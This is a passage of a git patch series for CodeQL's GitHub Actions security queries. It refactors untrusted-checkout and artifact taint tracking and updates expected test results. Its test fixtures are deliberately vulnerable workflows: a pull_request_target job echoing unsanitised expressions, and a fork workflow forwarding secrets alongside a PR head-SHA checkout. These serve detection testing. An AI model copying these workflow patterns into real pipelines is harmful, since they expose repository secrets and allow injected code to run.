"Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 86ac293521cf..0acb306b9d6f 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -2,3 +2,4 @@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | actions/upload-artifact | From f9d66d9b5e1c95885a49b45b4a3b384e8f78a847 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:37:00 +0200 Subject: [PATCH 495/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1a3918d5d986..0392a200bb40 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.40 +version: 0.1.41 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 64d40f754805..5b81393abdb4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.40 +version: 0.1.41 groups: [actions, queries] suites: codeql-suites extractor: javascript From 42b487b348329db069d1fc0b4f1bc542fe5b17ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:49:43 +0200 Subject: [PATCH 496/707] Match callers and callees when root is not the repo root When running codeql test run, the root of the database is not the root of the original repo (the directory containing .github and .git) therefore calls to reusable workflows are not correctly matched. --- .../dataflow/internal/DataFlowPrivate.qll | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 47cd38d47fab..2d3918414106 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -86,7 +86,7 @@ class DataFlowCall instanceof Cfg::Node { int totalorder() { none() } /** Gets the location of this call. */ - Location getLocation() { result = this.getLocation() } + Location getLocation() { result = this.(Cfg::Node).getLocation() } } /** @@ -97,7 +97,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflow - then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() + then + result = + this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .suffix(this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .indexOf("/.github/workflows") + 1) else if this instanceof CompositeAction then @@ -118,7 +128,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { int totalorder() { none() } /** Gets the location of this callable. */ - Location getLocation() { result = this.getLocation() } + Location getLocation() { result = this.(Cfg::CfgScope).getLocation() } } newtype TReturnKind = TNormalReturn() @@ -380,8 +390,8 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or - artifactToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or + artifactToOutputStoreStep(node1, node2, c) or artifactToEnvStoreStep(node1, node2, c) } From bd0c762781df6f3c1d69ad2d114600d18904b55c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:51:32 +0200 Subject: [PATCH 497/707] Refactor: Do not use PRHeadCheckoutStep on any dependency of TaintTracking Problem is that there are StoreSteps that depend on PRHeadCheckout so there is a non-monotic recursion error since PRHeadCheckout depends on TaintTracking module, but this module depends on PRHeadCheckout --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 35 ++++++++++--------- .../security/OutputClobberingQuery.qll | 11 +++++- 2 files changed, 29 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index aa31954ad3c5..9ca17eb4dab2 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -155,6 +155,20 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: ) } +predicate controlledCWD(Step artifact) { + artifact instanceof UntrustedArtifactDownloadStep or + // This shoould be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + artifact.(Uses).getCallee() = "actions/checkout" or + artifact instanceof GitMutableRefCheckout or + artifact instanceof GitSHACheckout or + artifact instanceof GhMutableRefCheckout or + artifact instanceof GhSHACheckout +} + /** * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 @@ -165,10 +179,7 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, Step artifact, string content, string key, string value | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | @@ -207,10 +218,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string content, string key, string value, Step artifact | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | @@ -246,25 +254,20 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF */ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Run run | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and pred.asExpr() = artifact and succ.asExpr() = run.getScriptScalar() and artifact.getAFollowingStep() = run ) } +// /** * A download artifact step followed by a envvar-injection uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Uses uses | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and madSink(succ, "envvar-injection") and pred.asExpr() = artifact and succ.asExpr() = uses and diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 5a85c22bb8fa..38a8d2b9d0b9 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -22,7 +22,16 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { exists(Run run, Step step | ( step instanceof UntrustedArtifactDownloadStep or - step instanceof PRHeadCheckoutStep + // This shoould be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + step.(Uses).getCallee() = "actions/checkout" or + step instanceof GitMutableRefCheckout or + step instanceof GitSHACheckout or + step instanceof GhMutableRefCheckout or + step instanceof GhSHACheckout ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and From 147da50cb993e35cc7831cd5ccf1efd573895255 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:52:09 +0200 Subject: [PATCH 498/707] Use Taint Tracking to track PR refs to checkout's ref argument --- .../security/UntrustedCheckoutQuery.qll | 150 +++++++++++------- 1 file changed, 95 insertions(+), 55 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 7cfda4da49cb..df3e1e4d8a2e 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -1,12 +1,90 @@ import actions -import codeql.actions.DataFlow +private import codeql.actions.DataFlow +private import codeql.actions.TaintTracking -string getStepCWD() { - // TODO: This should be the path of the git command. - // Read if from the step's CWD, workspace or look for a cd command. - result = "?" +/** + * A taint-tracking configuration for PR HEAD references flowing + * into actions/checkout's ref argument. + */ +private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + // `ref` argument contains the PR id/number or head ref + exists(Expression e | + source.asExpr() = e and + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) + ) + or + // 3rd party actions returning the PR head ref + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] + or + step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr("ref") = sink.asExpr() + ) + } +} + +module ActionsMutableRefCheckoutFlow = TaintTracking::Global; + +private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + // `ref` argument contains the PR head/merge commit sha + exists(Expression e | + source.asExpr() = e and + containsHeadSHA(e.getExpression()) + ) + or + // 3rd party actions returning the PR head sha + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_sha" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadSha", "mergeCommitSha"] + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr("ref") = sink.asExpr() + ) + } } +module ActionsSHACheckoutFlow = TaintTracking::Global; + bindingset[s] predicate containsPullRequestNumber(string s) { exists( @@ -73,6 +151,12 @@ predicate containsHeadRef(string s) { ) } +private string getStepCWD() { + // TODO: This should be the path of the git command. + // Read if from the step's CWD, workspace or look for a cd command. + result = "?" +} + /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); @@ -89,35 +173,9 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and ( - // ref argument contains the PR id/number or head ref/sha - exists(Expression e | - ( - containsHeadRef(e.getExpression()) or - containsPullRequestNumber(e.getExpression()) - ) and - DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) - ) - or - // 3rd party actions returning the PR head sha/ref - exists(UsesStep step | - ( - step.getCallee() = - [ - "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", - "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" - ] and - // TODO: This should be read step of the head_sha or head_ref output vars - this.getArgument("ref").regexpMatch(".*(head_ref).*") - or - step.getCallee() = "potiuk/get-workflow-origin" and - // TODO: This should be read step of the ref output var - this.getArgument("ref").matches("%." + ["sourceHeadBranch", "pullRequestNumber"]) - or - step.getCallee() = "github/branch-deploy" and - // TODO: This should be read step of the ref output var - this.getArgument("ref").matches("%.ref%") - ) and - DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) + exists(ActionsMutableRefCheckoutFlow::PathNode sink | + ActionsMutableRefCheckoutFlow::flowPath(_, sink) and + sink.getNode().asExpr() = this.getArgumentExpr("ref") ) or // heuristic base on the step id and field name @@ -159,27 +217,9 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and ( - // ref argument contains the PR id/number or head ref/sha - exists(Expression e | - containsHeadSHA(e.getExpression()) and - DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) - ) - or - // 3rd party actions returning the PR head sha/ref - exists(UsesStep step | - ( - step.getCallee() = - [ - "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", - "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" - ] and - this.getArgument("ref").regexpMatch(".*(head_sha).*") - or - step.getCallee() = "potiuk/get-workflow-origin" and - // TODO: This should be read step of the ref output var - this.getArgument("ref").matches("%." + ["sourceHeadSha", "mergeCommitSha"]) - ) and - DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) + exists(ActionsSHACheckoutFlow::PathNode sink | + ActionsSHACheckoutFlow::flowPath(_, sink) and + sink.getNode().asExpr() = this.getArgumentExpr("ref") ) or // heuristic base on the step id and field name From a9a297ab78571f563890eb588136a1275d5b4c06 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:52:21 +0200 Subject: [PATCH 499/707] Update tests --- .../Security/CWE-094/.github/workflows/or.yml | 14 + .../CWE-094/CodeInjectionCritical.expected | 12 + .../CWE-094/CodeInjectionMedium.expected | 10 + .../.github/workflows/pr-workflow-fork.yaml | 27 + .../CWE-829/.github/workflows/pr-workflow.yml | 463 ++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 10 + .../UntrustedCheckoutCritical.expected | 37 ++ 7 files changed, 573 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml new file mode 100644 index 000000000000..bb873ca4eac8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml @@ -0,0 +1,14 @@ +name: CI + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ inputs.github_event_pull_request_head_sha || github.sha }} + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 69085548f69d..2097a589b5a3 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -64,8 +64,12 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -270,10 +274,16 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -434,7 +444,9 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 360c33720fb0..ce4d74467f95 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -64,8 +64,12 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -270,10 +274,16 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml new file mode 100644 index 000000000000..98c25f832316 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml @@ -0,0 +1,27 @@ +name: "pr-workflow-fork" +concurrency: + group: ${{ github.workflow }}-pr-workflow-fork-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + +on: + pull_request_target: + +jobs: + pr-workflow-fork: + uses: ./.github/workflows/pr-workflow.yml + with: + github_event_name: ${{ github.event_name }} + github_event_pull_request_head_repo_id : ${{ github.event.pull_request.head.repo.id }} + github_workflow: $ {{ github.workflow }} + github_event_pull_request_head_sha: ${{ github.event.pull_request.head.sha }} + flow: ${{( github.event_name == 'push' && 'push' ) || ( github.event_name == 'merge_group' && 'merge_queue_check' ) || ( github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.id != 383289760 && 'pr_from_fork' ) || ( github.event_name == 'pull_request' && github.event.pull_request.head.repo.id == 383289760 && 'pr_from_branch' )}} + sha_to_check: ${{ github.event.pull_request.head.sha || github.sha }} + + secrets: + CACHIX_AUTH_TOKEN: ${{ secrets.CACHIX_AUTH_TOKEN }} + DOCKER_HUB_USERNAME: ${{ secrets.DOCKER_HUB_USERNAME }} + DOCKER_HUB_ACCESS_TOKEN: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + PABLO_PROJ_JSON: ${{ secrets.PABLO_PROJ_JSON }} + VERCEL_TOKEN: ${{ secrets.VERCEL_TOKEN }} + CANCEL_GITHUB_TOKEN: ${{ github.token }} + NIXBUILD_TOKEN: ${{ secrets.NIXBUILD_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml new file mode 100644 index 000000000000..061ff7d02c5e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml @@ -0,0 +1,463 @@ +name: "pr-workflow" +concurrency: + group: ${{ github.workflow }}-pr-workflow-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true +on: + workflow_call: + inputs: + github_event_name: + required: true + type: string + github_event_pull_request_head_repo_id: + required: true + 